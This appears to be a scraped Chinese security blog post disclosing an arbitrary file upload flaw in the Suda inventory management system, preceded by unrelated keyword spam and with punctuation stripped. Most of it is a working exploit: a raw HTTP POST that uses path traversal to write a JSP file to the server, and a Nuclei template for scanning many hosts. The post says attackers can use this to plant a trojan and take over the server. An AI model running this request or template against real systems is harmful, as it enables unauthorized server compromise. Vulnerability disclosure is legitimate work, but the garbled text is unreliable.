某购物网站建设方案,扶贫网站建设,织梦者网站模板,怎么创建网站免费的免责声明#xff1a;
文章中涉及的漏洞均已修复#xff0c;敏感信息均已做打码处理#xff0c;文章仅做经验分享用途#xff0c;切勿当真#xff0c;未授权的攻击属于非法行为#xff01;文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…免责声明
文章中涉及的漏洞均已修复敏感信息均已做打码处理文章仅做经验分享用途切勿当真未授权的攻击属于非法行为文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责作者不为此承担任何责任一旦造成后果请自行负责
一漏洞描述
速达进存销管理系统是一套完整的企业业务管理系统统有机的将企业进货管理、销售管理、仓储管理、财务管理融为一体有着极好易用性和实用性全面提升了企业的管理能力和工作效率。该产品存在任意文件上传攻击者看上传木马文件获得服务器权限。
二漏洞影响版本
速达进存销管理系统
三网络空间测绘查询
app速达软件-公司产品
四漏洞复现 POC:
POST /report/DesignReportSave.jsp?report../test.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Connection: close
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/octet-stream
Content-Length: 49% out.print(This page has a vulnerability!);%访问/test.jsp
批量检测
id: suda-guanli-system-uploadinfo:name: suda-guanli-system-uploadauthor: 芝士土拨鼠severity: highdescription: 速达进存销管理系统是一套完整的企业业务管理系统统有机的将企业进货管理、销售管理、仓储管理、财务管理融为一体有着极好易用性和实用性全面提升了企业的管理能力和工作效率。该产品存在任意文件上传攻击者看上传木马文件获得服务器权限requests:- raw:- POST /report/DesignReportSave.jsp?report../test.jsp HTTP/1.1\nHost: {{Hostname}}\n\User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101\\ Firefox/120.0\nAccept-Encoding: gzip, deflate\nAccept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8\n\Connection: close \nAccept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2\n\Upgrade-Insecure-Requests: 1\nContent-Type: application/octet-stream\nContent-Length:\\ 49\n\n% out.print(\This page has a vulnerability!\);%matchers-condition: andmatchers:- type: wordpart: headerwords:- 200- type: statusstatus:- 200
